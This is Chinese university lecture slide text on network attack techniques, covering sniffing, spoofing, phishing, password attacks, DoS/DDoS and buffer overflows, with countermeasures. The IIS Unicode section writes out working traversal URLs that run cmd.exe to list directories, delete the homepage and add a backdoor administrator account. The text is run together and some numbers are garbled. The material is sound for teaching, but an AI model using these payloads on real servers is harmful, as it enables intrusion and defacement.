安全与支付4网络攻击技术

安全与支付第4讲网络攻击技术网络攻击技术主要内容网络监听攻击口令攻击扫描攻击欺骗攻击漏洞利用攻击拒绝服务攻击监听攻击网络监听网络监听指的是利用计算机的网络接口捕获网络上传输的目的地址为其它计算机的数据报文。网络监听工具也常称作嗅探器，Snifferpro就是一个功能完善的网络监听工具监听攻击就是利用嗅探器来收集网络上传输的敏感信息正在传输的用户名或信用卡号、密码各种非共享机密数据通信主机的接口地址、TCP连接的字节顺序号码以太网监听原理在以太网局域网中一台计算机与其他计算机进行数据交换的时候，本局域网中的所有计算机都会收到数据包，但只有与数据包中目标地址一致的那台主机才会接收和处理数据包，其它的机器都会将包丢弃。但是，当主机工作在监听模式下时，无论接收到的数据包中目标地址是什么，主机都将其接收下来。然后对数据包进行分析，就得到了局域网中通信的数据。嗅探器（Sniffer）就是将网卡设置为混杂模式，目的是使网络接口处于监听状态，从而可接收网络上传输的每一个数据包。网络监听常用Sniffer工具除了非常著名的监听软件SnifferPro外，还有一些常用的监听软件：Unix、Linux：Sniffit、TcpdumpWindows系统:Iris、NetworkMonitor

免费Ethereal：密码监听工具WinSniffer：监听局域网内密码

pswmonitor：监听Web邮箱密码、POP3邮箱密码、Ftp登录密码等8如何发现和防范sniffer网络通讯掉包率反常的高。网络带宽将出现异常。对于怀疑运行监听程序的主机，用正确的IP地址和错误的物理地址去PING，正常的机器不接受错误的物理地址，处于监听状态的机器能接受，这种方法依赖系统的IPSTACK，对有些系统可能行不通。往网上发大量包含着不存在的物理地址的包,由于监听程序将处理这些包，将导致性能下降，通过比较前后该机器性能（icmpechodelay等方法）加以判断9如何发现和防范sniffer2．对网络监听的防范措施从逻辑或物理上对网络分段

其目的是将非法用户与敏感的网络资源相互隔离，从而防止可能的非法监听。

以交换式集线器代替共享式集线器，使单播包仅在两个节点之间传送，从而防止非法监听。（3）使用加密技术

数据经过加密后，通过监听仍然可以得到传送的信息,但显示的是乱码。（4）划分VLAN

运用VLAN（虚拟局域网）技术，将以太网通信变为点到点通信，可以防止大部分基于网络监听的入侵。

欺骗攻击IP欺骗伪造他人的源IP地址，利用正常信任关系发动的攻击ARP欺骗伪造IP地址和MAC地址的对应关系DNS欺骗让DNS服务器的缓存中存在错误的IP地址映射Web欺骗（钓鱼攻击）假冒的web站点，骗取用户的机密信息如04年10月发生的“网络银行”欺诈(网络钓鱼攻击)IP欺骗攻击IP欺骗攻击13IP欺骗的防止（1）抛弃基于地址的信任策略（2）进行包过滤（3）使用加密方法（4）使用随机化的初始序列号DNS欺骗攻击DNS欺骗攻击DNS特性DNS对其本身无法解析的域名会自动向其他DNS服务器查询为提高效率DNS会将查询结果存入缓存DNS欺骗的基本思路让DNS服务器的缓存中存有错误的IP地址映射攻击者要做两件事：伪造一个用户的DNS请求伪造一个查询应答DNS欺骗攻击网络钓鱼攻击网络钓鱼(Phishing)一词，是“Fishing”和“Phone”的综合体，由于黑客始祖起初是以电话作案，所以用“Ph”来取代“F”，创造了”Phishing”攻击者利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动，诱骗访问者提供一些个人信息，如信用卡号、账户和口令、社保编号等内容（通常主要是那些和财务，账号有关的信息，以获取不正当利益），受骗者往往会泄露自己的机密数据网络钓鱼攻击钓鱼者入侵初级服务器，窃取用户的名字和邮件地址钓鱼者发送有针对性质的邮件受害用户访问假冒网站受害用户提供秘密，用户信息被钓鱼者取得钓鱼者使用受害用户的身份进入其他网络服务器如04年10月发生的“网络银行”欺诈(网络钓鱼攻击)工行：—中国：—漏洞攻击利用已发现的系统或应用软件实现上的漏洞攻击系统操作系统或应用软件不可避免存在漏洞Windows3.1—300万行代码Windows2000—5000万行代码通过及时为系统安装补丁程序，就可以消除系统漏洞。只要是针对漏洞进行攻击的案例都依赖于系统是否打了相关的补丁。漏洞攻击实例：微软IIS服务器的Unicode漏洞攻击：

Unicode漏洞是2000-10-17发布的，受影响的版本：MicrosoftIIS5.0+MicrosoftWindows2000系列版本MicrosoftIIS4.0+MicrosoftWindowsNT4.0

消除该漏洞的方式是安装操作系统的补丁，只要安装了SP1以后，该漏洞就不存在了。微软IIS4.0和5.0都存在利用扩展UNICODE字符取代“/”和“\”，而能利用"../"目录遍历的漏洞漏洞攻击Unicode漏洞的检测方法：使用扫描工具来检测Unicode漏洞是否存在，用前面介绍的X-Scan来对目标系统进行扫描，目标主机IP为：09，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以只要是/scripts开头的漏洞都是Unicode漏洞。如下面的扫描结果，就显示此服务器有Unicode漏洞/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\(HTTP:200)漏洞攻击漏洞攻击其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录，scripts目录一般系统盘根目录下的Inetpub目录下，C:\Inetput\ScriptC:\Inetput\wwwroot在Windows的目录结构中，可以使用两个点和一个斜线“../”来访问上一级目录，在浏览器中利用“scripts/../../”可以访问到系统盘根目录，访问“scripts/../../winnt/system32”就访问到系统的系统目录了，在system32目录下包含许多重要的系统文件，比如cmd.exe文件，可以利用该文件新建用户，删除文件等操作。漏洞攻击浏览器地址栏中禁用符号“../”，但是可以使用符号“/”的Unicode的编码。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。利用该漏洞读取出计算机上目录列表，比如读取C盘的目录，只要在浏览器中输入“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\”得到如下结果：漏洞攻击漏洞攻击利用Unicode漏洞删除主页：利用Unicode可以方便的更改对方的主页，比如现在已经知道对方网站的根路径在“C:\Initpub\wwwroot”（系统默认）下，可以删除该路径下的文件“default.asp”来删除主页，这里“default.asp”文件是IIS的默认启动页面使用的语句是：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\default.asp漏洞攻击利用Unicode漏洞拷贝文件：为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe程序执行结果如图所示。漏洞攻击利用Unicode漏洞入侵系统：在浏览器地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode漏洞在对方系统建立管理员账号可以通过下面一系列操作在对方主机创建一个有管理员权限的用户36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+echo+net+user+hacker+1234+/add+>c:\inetpub\scripts\hack.bat36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+echo+net+user+hacker+/active:yes+>>c:\inetpub\scripts\hack.bat漏洞攻击然后通过以下方式运行hack.bat文件

36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\hack.bat

选择打开，通过以上4步则在服务器上添加了一个管理员权限用户hacker，密码是1234口令攻击口令攻击是指把口令破解出来、获取口令、或者让口令保护失效。主要技术：字典攻击暴力攻击其它方法嗅探分析木马窃取社交欺骗口令攻击字典攻击攻击者基于某些知识构造口令字符串，生成口令字典，然后利用字典里的这些可能的字符串来测试密码目的是缩小尝试的范围，高效快速的得到系统的密码。一个字典文件本身就是一个标准的文本文件，其中的每一行就代表一个可能的密码。口令攻击口令字典的构造方法口令攻击暴力攻击：通过穷举的方法，使用所有可能口令的字符组合逐一测试，也称穷举攻击。比如先从字母a尝试，尝试aa、ab、ac…然后再尝试aaa、aab、aac…实例：利用软件GetNTUser破解密码，如图：口令攻击口令攻击口令攻击软件口令攻击口令攻击软件37设置安全的口令

在一个安全的口令里应该包含大小写字母、数字、标点、空格、控制符等，另外口令越长，攻击的难度越大。假设每秒钟测试一百万次，用小写字母组成的4字符口令，穷举攻击需要的最大次数为26^4，穷举搜索仅需要0.5秒；由所有可输入字符构成的4字符口令，则需要95^8次穷举，搜索需要的时间为1.4分钟，而8字符口令，则要95^8次穷举，搜索需要的时间为210年。随着硬件速度的不断提高以及互联网强大的分布计算能力，口令很难真正抵抗住穷举攻击的威胁。许多人设置口令时喜欢使用生日、名字、电话号码、身份证号码、地名、常用单词等，这样的口令固然便于记忆，但安全性极差。字典攻击对于这样的弱口令很奏效。38设置安全的口令口令的选择：字母数字及标点的组合，如：Ha,Pp@y!和w/(X,y)*;使用一句话的开头字母做口令，如：由Afoxjumpsoveralazydog!产生口令AfJoAld!。口令的保存：记住、放到安全的地方，加密最好。口令的使用：输入口令不要让别人看到；不要在不同的系统上使用同一口令；定期改变口令。39一次性口令（OTP，One-TimePassword）。一个口令仅使用一次，能有效地抵制重放攻击OTP的主要思路是：在登录过程中加入不确定因素，使每次登录过程中的生成的口令不相同。口令列表，每次登录使用完一个口令后就将它从列表明中删除；用户也可以使用IC卡或其他的硬件卡来存储用户的秘密信息，这些信息再随机数、系统时间等参数一起通过散列得到一个一次性口令。拒绝服务攻击DoS--DenialofService：凡是能导致合法用户不能够访问正常网络服务的行为都是“拒绝服务攻击”。DoS最主要的目的是：造成被攻击服务器资源耗尽或系统崩溃而无法提供服务。服务本身无伤害；可使提供服务的信任度下降，影响公司的声誉以及用户对网络服务的使用。常见的DoS攻击：①带宽攻击：以极大的通信量冲击网络，使网络所有可用的带宽都被消耗掉。②连通性攻击：用大量的连接请求冲击计算机，最终导致计算机无法响应和处理合法用户的请求。单一的DoS攻击一般是采用一对一的方式，当攻击的计算机CPU速度低、内存小或网络带宽小等各项性能指标不高时，效果是明显的。DoS攻击的分类以消耗目标主机的可用资源为目的（例如：死亡之ping、SYN攻击、Land攻击、泪珠攻击等）以消耗服务器链路的有效带宽为目的（例如：蠕虫）攻击者

目标主机SYNSYN/ACKACK等待应答SYN：同步SYN/ACK:同步/确认ACK：确认SYN攻击的原理（1）....SYN/ACKSYN/ACKSYN/ACKSYNSYNSYN攻击者目标主机SYNSYN/ACK1nSYN/ACKSYN/ACKSYN/ACKSYN/ACK....等待ACK应答.........不应答不应答重新发送SYN攻击的原理（2）以Windows为例SYN攻击花费时间（秒）累计花费时间（秒）第一次，失败33尝试第1次，失败69尝试第2次，失败1221尝试第3次，失败2445尝试第4次，失败4893尝试第5次，失败96189死亡之pingSYNFloodLand攻击泪珠（Teardrop）攻击

行行色色的DoS攻击1)攻击者攻击诸客户主机以求分析他们的安全水平和脆弱性。攻击者各种客户主机目标系统2)攻击者进入其已经发现的最弱的客户主机之内(“肉鸡”)，并且秘密地安置一个其可远程控制的代理程序(端口监督程序demon)。攻击准备：安置代理代理程序DDoS(分布式拒绝服务)攻击（1）

3)攻击者使他的全部代理程序同时发送由残缺的数字包构成的连接请求送至目标系统。攻击者目标系统发起攻击：指令攻击的代理程序4)包括虚假的连接请求在内的大量残缺的数字包攻击目标系统，最终将导致它因通信淤塞而崩溃。虚假的连接请求DDoS(分布式拒绝服务)攻击（2）DDoS和DoS小结DDoS的攻击策略侧重于通过很多“僵尸主机”（被攻击者入侵过或可间接利用的主机）向受害主机发送大量看似合法的网络包，从而造成网络阻塞或服务器资源耗尽而导致拒绝服务，分布式拒绝服务攻击一旦被实施，攻击网络包就会犹如洪水般涌向受害主机，从而把合法用户的网络包淹没，导致合法用户无法正常访问服务器的网络资源，因此，拒绝服务攻击又被称之为“洪水式攻击”，常见的DDoS攻击手段有SYNFlood、ACKFlood、UDPFlood、ICMPFlood、TCPFlood、ConnectionsFlood、ScriptFlood、ProxyFlood等；DoS则侧重于通过对主机特定漏洞的利用攻击导致网络栈失效、系统崩溃、主机死机而无法提供正常的网络服务功能，从而造成拒绝服务，常见的DoS攻击手段有TearDrop、Land、Jolt、IGMPNuker、Boink、Smurf、Bonk、OOB等。缓冲区溢出（bufferoverflow)攻击从一个对话框说起……认识缓冲区溢出【引例】把1升的水注入容量为0.5升的容量中……第一次大规模的缓冲区溢出攻击是发生在1988年的Morris蠕虫，它造成了6000多台机器被瘫痪，损失在$100000至$10000000之间，利用的攻击方法之一就是fingerd的缓冲区溢出。缓冲区溢出攻击已经占了网络攻击的绝大多数，据统计，大约80%的安全事件与缓冲区溢出攻击有关。流行的缓冲区溢出攻击病毒(1)冲击波

利用漏洞：RPC缓冲区溢出135/TCP(2)震荡波

利用漏洞：LSASS漏洞1025/TCP(3)极速波

利用漏洞：UPNP漏洞445/TCP(4)高波

利用多种漏洞,非常危险恶意代码攻击病毒寄生、感染、